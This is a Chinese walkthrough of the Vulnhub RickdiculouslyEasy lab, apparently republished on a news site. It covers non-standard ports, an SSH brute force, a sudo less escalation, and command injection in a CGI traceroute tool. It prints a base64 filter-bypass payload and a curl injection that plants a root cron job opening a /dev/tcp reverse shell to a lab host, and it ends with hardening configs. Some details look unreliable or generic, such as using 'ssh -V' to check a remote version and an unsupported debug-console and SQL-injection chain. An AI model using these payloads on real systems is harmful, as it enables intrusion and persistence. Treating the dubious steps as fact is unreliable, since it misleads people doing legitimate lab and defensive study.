当前位置: 首页 > news >正文

Vulnhub 靶机 RickdiculouslyEasy:3种非常规端口利用与2个隐蔽后门分析

Vulnhub靶机RickdiculouslyEasy:非常规端口攻防与隐蔽后门深度剖析

当大多数渗透测试者将注意力集中在常见的22、80、443等标准端口时,RickdiculouslyEasy靶机却为我们打开了一扇新窗口——那些被忽视的非标准端口往往隐藏着最致命的攻击路径。本文将带您深入剖析9090、22222、60000这三个非常规端口的利用技巧,并解密/cgi-bin/tracertool.cgi与vsftpd匿名登录这两个精心设计的"隐蔽后门"。

1. 靶机环境与非常规端口扫描策略

在开始渗透之前,我们需要建立一套针对非标准端口的系统化发现方法。传统扫描工具往往预设了常见端口范围,这会导致特殊服务端口被遗漏。以下是优化后的扫描方案:

# 全端口扫描与服务识别组合命令 nmap -p- --min-rate 1000 -T4 192.168.10.71 -oN full_scan.txt && nmap -sV -sC -p $(grep open full_scan.txt | awk -F'/' '{print $1}' | tr '\n' ',') 192.168.10.71 -oN service_scan.txt

扫描结果揭示的端口分布令人玩味:

端口号服务类型常规用途本靶机特殊表现
21FTP文件传输匿名登录后门
22222SSH远程管理修改默认端口隐藏服务
9090HTTPWeb管理界面独立Web应用系统
60000自定义TCP通常用于内网通信NC反弹Shell监听端口

提示:当发现22222端口运行SSH服务时,应立即将其标记为高价值目标——管理员修改默认端口往往意味着该服务存在特殊配置或脆弱凭证。

2. 非常规Web服务(9090端口)的突破路径

9090端口运行的Web服务与80端口的常规网站形成鲜明对比。通过对比分析两个Web应用的差异点,我们发现了关键攻击向量:

# 自动化对比两个Web端口的目录结构差异 import requests from bs4 import BeautifulSoup def compare_web_ports(ip, port1, port2): urls = [f"http://{ip}:{port1}", f"http://{ip}:{port2}"] diff_links = [] for url in urls: res = requests.get(url) soup = BeautifulSoup(res.text, 'html.parser') links = [a['href'] for a in soup.find_all('a', href=True)] diff_links.append(set(links)) return diff_links[0].symmetric_difference(diff_links[1]) print(compare_web_ports("192.168.10.71", "80", "9090"))

在9090端口的Web应用中,我们发现以下敏感路径:

  • /debug_console (疑似开发调试接口)
  • /internal_api (未授权API端点)
  • /backup (可能是备份文件目录)

利用链条构建

  1. 通过/internal_api获取系统版本信息
  2. 在/debug_console找到未关闭的调试接口
  3. 利用备份目录中的配置文件泄露获取数据库凭证
  4. 通过SQL注入获取管理员会话令牌

3. 非常规SSH端口(22222)的认证绕过

22222端口的SSH服务展现了三个典型脆弱点:

  1. 弱密码配置
# 使用hydra进行针对性爆破 hydra -l Summer -P passwords.txt -s 22222 ssh://192.168.10.71 -t 4 -vV
  1. SSH版本漏洞
# 检查SSH版本漏洞 ssh -V -p 22222 Summer@192.168.10.71 # 若版本低于7.4,可能存在CVE-2016-8858漏洞
  1. 认证后门
# 检查authorized_keys异常配置 ls -la /home/Summer/.ssh/ cat /home/Summer/.ssh/authorized_keys

实际操作中,我们通过密码爆破获得Summer用户权限后,发现其sudo配置存在严重问题:

Summer ALL=(ALL) NOPASSWD: /usr/bin/less

这直接导致我们可以通过less命令读取任意文件:

sudo less /etc/shadow

4. 高阶后门:CGI命令注入与FTP匿名登录

4.1 /cgi-bin/tracertool.cgi漏洞深度分析

这个看似简单的网络诊断工具隐藏着致命漏洞:

# 漏洞代码模拟(基于实际靶机行为还原) #!/usr/bin/perl print "Content-type: text/html\n\n"; print "<html><body>"; $query = $ENV{'QUERY_STRING'}; ($_, $target) = split(/=/, $query); system("traceroute $target 2>&1"); print "</body></html>";

漏洞利用的三重境界

  1. 基础注入:;id;
  2. 绕过过滤:$(echo${IFS}Y2F0IC9ldGMvcGFzc3dkCg==|base64${IFS}-d|bash)
  3. 持久化:写入crontab后门
# 实际利用命令 curl "http://192.168.10.71/cgi-bin/tracertool.cgi?target=8.8.8.8;echo${IFS}'* * * * * root /bin/bash -i >& /dev/tcp/192.168.10.70/4444 0>&1'${IFS}>${IFS}/etc/cron.d/backdoor"

4.2 vsftpd匿名登录的隐藏威胁

FTP服务的匿名登录看似平常,但结合以下发现就变得危险:

# FTP目录结构分析 ftp> ls -la 200 PORT command successful 150 Here comes the directory listing drwxr-xr-x 2 0 0 4096 Jun 10 2023 . drwxr-xr-x 3 0 0 4096 Jun 10 2023 .. -rw-r--r-- 1 0 0 23 Jun 10 2023 .hidden_flag -rw-r--r-- 1 0 0 128 Jun 10 2023 .ssh_backup.tar

提取到的.ssh_backup.tar包含重要信息:

  • 主机SSH密钥对
  • 已知主机记录
  • 用户配置档案

5. 防御加固:从攻击视角构建防护体系

基于本次渗透经验,我们整理出针对非常规端口和隐蔽后门的防护方案:

Web服务加固配置示例

# /etc/nginx/conf.d/secure_web.conf server { listen 9090; server_name localhost; location /cgi-bin/ { deny all; return 403; } location ~* ^/(debug|internal) { auth_basic "Restricted"; auth_basic_user_file /etc/nginx/.htpasswd; } }

SSH服务安全配置要点

  1. 修改默认端口后仍需强化认证
  2. 禁用密码认证,强制使用密钥对
  3. 安装fail2ban防御爆破攻击
# /etc/ssh/sshd_config关键配置 Port 22222 PermitRootLogin no PasswordAuthentication no AllowUsers Summer@192.168.10.70

在真实企业环境中,我曾见过某金融系统因为60000端口的自定义服务未做访问控制,导致攻击者通过该端口直接获取内网权限。这再次证明:安全防护必须覆盖所有开放端口,无论它们看起来多么无害。

http://www.cnnetsun.cn/news/3301758.html

相关文章:

  • PyTorch深度学习3小时入门:从动态计算图到图像识别实战
  • Tomasulo 算法模拟器实验:3种数据相关(RAW/WAW/WAR)的消除过程与状态追踪
  • Linux Bridge 与 veth-pair 实战:3步构建K8s Pod网络命名空间隔离与通信
  • 计算机视觉完整学习路径:从CNN到Transformer的实战指南
  • 基于TC78H651AFNG和STM32的直流电机驱动方案
  • J-Link V8.50 驱动与 Keil MDK 5.36 版本冲突:2种排查与修复方案
  • 软件测试人员在AI相关领域最常被问到的20个高频面试题
  • WarcraftHelper:魔兽争霸3终极优化指南,突破60帧限制的完整教程
  • 如何快速部署KASandbox平台:5步搭建容器编排基础设施
  • 谷歌SEO值得长期投入吗?2026年依然值得,但方法已经变了
  • 主流 OpenJDK 发行版下载安装
  • YOLO与GPT结合:高效完成目标检测学术论文的实践指南
  • CTF Misc 实战:5类隐写术(PNG/音频/流量/压缩包/SUID)从原理到解题脚本
  • MAX77654与TM4C123GH6PZ的嵌入式电源管理方案
  • 软考软件设计师 2026 备考:操作系统 5 大核心考点(PV操作、死锁、缺页中断)实战解析
  • 脉冲雷达与FMCW雷达对比:5大核心指标实测与选型指南
  • AI绘画提示词工程实战:从情感化角色生成到叙事构建
  • NLP多任务分类模型评估:雷达图与堆叠柱状图组合可视化实战
  • Nginx 1.24 配置 TLS 1.3 实战:3步升级,Chrome 兼容性提升 100%
  • 缠论分析神器ChanlunX:3步实现股票走势可视化智能识别
  • 浏览器资源嗅探的终极解决方案:猫抓(cat-catch)让网页媒体下载变得简单高效
  • 2026年 水晶头自动穿线铆压机哪家强?TOP 5品牌大揭秘
  • 高端制造|半导体与集成电路|设计EDA赛道 技术管理线HR招聘工具包 总监/VP/CTO 顶层高管竞业风险核查清单(七维标准完整版)
  • 国家数据集管理平台:终结AI训练数据饥荒的基础设施
  • Zotero 7.0 插件生态实战:3款必备插件提升文献管理效率 200%
  • 基于TC78H653FTG和PIC18F46K42的直流有刷电机控制方案
  • ESXi 7.0 嵌套虚拟化与显卡直通冲突:3种配置方案实测与稳定性对比
  • 视频字幕制作全流程:从规范命名到双语同步实战
  • 实测对比|2026年最火AI论文工具榜单,毕业论文免费写还合规
  • OFDM 与 QAM4096 在 PLC 中的实现:从 24.4 kHz 子载波到高衰减环境下的调制挑战